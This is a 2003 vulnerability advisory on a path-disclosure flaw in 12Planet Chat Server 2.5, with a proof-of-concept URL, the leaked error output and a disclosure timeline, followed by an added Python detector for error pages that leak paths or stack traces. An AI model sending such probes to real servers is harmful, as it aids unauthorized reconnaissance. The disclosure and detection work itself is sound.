Root directory revealing vulnerability
Found in 12Planet Chat Server 2.5
http://www.12planet.com

Discovered by Dennis Rand
------------------------------------------------------------------------

-----[SUMMARY
12Planet Chat Server provides advanced chat functionalities aiming to
offer discussion space for customers, partners and visitors.
It addresses the demand from all web sites and intranet/extranet
portals willing to offer "sticky" services to their visitors as well
as secure and reliable real-time communication to their customers.
Its moderation option enables businesses to organize online chat
conferences by inviting celebrities, experts to talk with visitors and
moderate visitor questions through a moderation process.

It is possible to get the root directory revealed by sending
a specific URL request.

-----[AFFECTED SYSTEMS
Vulnerable systems:
 * 12Planet Chat Server 2.5

Immune systems:
 *

-----[SEVERITY
Low - An attacker has the possibility to find the location on the server
where the Chat Server is installed.

-----[DESCRIPTION OF WHAT THE VULNERABILITY IS
The following transcript demonstrates a sample exploitation of the
vulnerability:
-------------------------------------------------------------------
Anything less than 3 times /qwe and you will only get an
HTTP 500 - Internal server error

Proof-Of-Concept exploit:

[Input in browser]
http://vuln-host:8080/qwe/qwe/qwe/index.html

[Output]
Error: 500
Internal Servlet Error:
java.io.IOException: bad path: C:\Program Files\12Planet Chat Server v2.5.1\www\qwe\qwe\qwe\index.html
	at java/io/File.canonPath
	at java/io/File.getCanonicalPath
	at com/sun/web/core/DefaultServlet.doGet
	at javax/servlet/http/HttpServlet.service
	at javax/servlet/http/HttpServlet.service
	at com/sun/web/core/ServletWrapper.handleRequest
	at com/sun/web/core/Context.handleRequest
	at com/sun/web/server/ConnectionHandler.run
--------------------------------------------------------------------

-----[DETECTION
12Planet Chat Server 2.5 is vulnerable to the above-described attacks.
Earlier versions may be susceptible as well. To determine if a specific
implementation is vulnerable, experiment by following the above transcript.

-----[VENDOR RESPONSE
Thank you for the bug report. We are currently analyzing the issues and
will keep you updated on the progress.
12Planet will provide assistance to all the customers that are interested
in the patch (email to: support@12planet.com)

Best regards,
Lei
12Planet

-----[DISCLOSURE TIMELINE
21/02/2003 Found the Vulnerability.
21/02/2003 Reported to iDEFENSE
31/03/2003 Received rejection from iDEFENSE
01/04/2003 Reported to 12Planet (support@12planet.com; bugs@12planet.com;
           sales@12planet.com; features@12planet.com)
01/04/2003 Received response from 12Planet
11/04/2003 Public Disclosure.

-----[ADDITIONAL INFORMATION
The vulnerability was discovered by Dennis Rand

-----[DISCLAIMER
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
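
Added example (not part of the original advisory): a Python check that flags error responses leaking an absolute install path or a Java stack trace, as in the [Output] above, for use over captured response bodies or in a regression test after hardening the error page. The function name, the sample strings and the list of Unix root directories are assumptions made for this illustration.

```python
import re

# Stack frames as printed in the advisory ("at java/io/File.canonPath") and by
# current JVMs ("at java.io.File.getCanonicalPath(File.java:...)").
FRAME = re.compile(r"^\s*at\s+[\w$]+(?:[./][\w$<>]+)+", re.MULTILINE)
# Absolute paths: Windows drive-letter paths, and Unix paths under common roots.
WIN_PATH = re.compile(r"\b[A-Za-z]:\\[^\r\n<>\"|?*]+")
UNIX_PATH = re.compile(r"(?<![\w.])/(?:opt|usr|var|home|srv|etc)/[^\s<>\"']+")


def find_disclosure(status, body):
    """Return what an error response leaks about the server, or None if clean."""
    if status < 400:
        return None
    frames = FRAME.findall(body)
    paths = {p.rstrip() for p in WIN_PATH.findall(body)}
    paths |= set(UNIX_PATH.findall(body))
    if not frames and not paths:
        return None
    return {"paths": sorted(paths), "stack_frames": len(frames)}


# Constructed sample: the error page quoted in the advisory, one frame per line.
SAMPLE_500 = r"""Error: 500
Internal Servlet Error:
java.io.IOException: bad path: C:\Program Files\12Planet Chat Server v2.5.1\www\qwe\qwe\qwe\index.html
	at java/io/File.canonPath
	at java/io/File.getCanonicalPath
	at com/sun/web/core/DefaultServlet.doGet
	at javax/servlet/http/HttpServlet.service
	at javax/servlet/http/HttpServlet.service
	at com/sun/web/core/ServletWrapper.handleRequest
	at com/sun/web/core/Context.handleRequest
	at com/sun/web/server/ConnectionHandler.run
"""

# Constructed sample: the generic error text the advisory mentions for shorter paths.
GENERIC_500 = "HTTP 500 - Internal server error"

if __name__ == "__main__":
    for name, body in (("verbose", SAMPLE_500), ("generic", GENERIC_500)):
        print(name, find_disclosure(500, body))
```

A response that returns None here still needs the underlying fix: the server should log the exception locally and send the client only a generic error page.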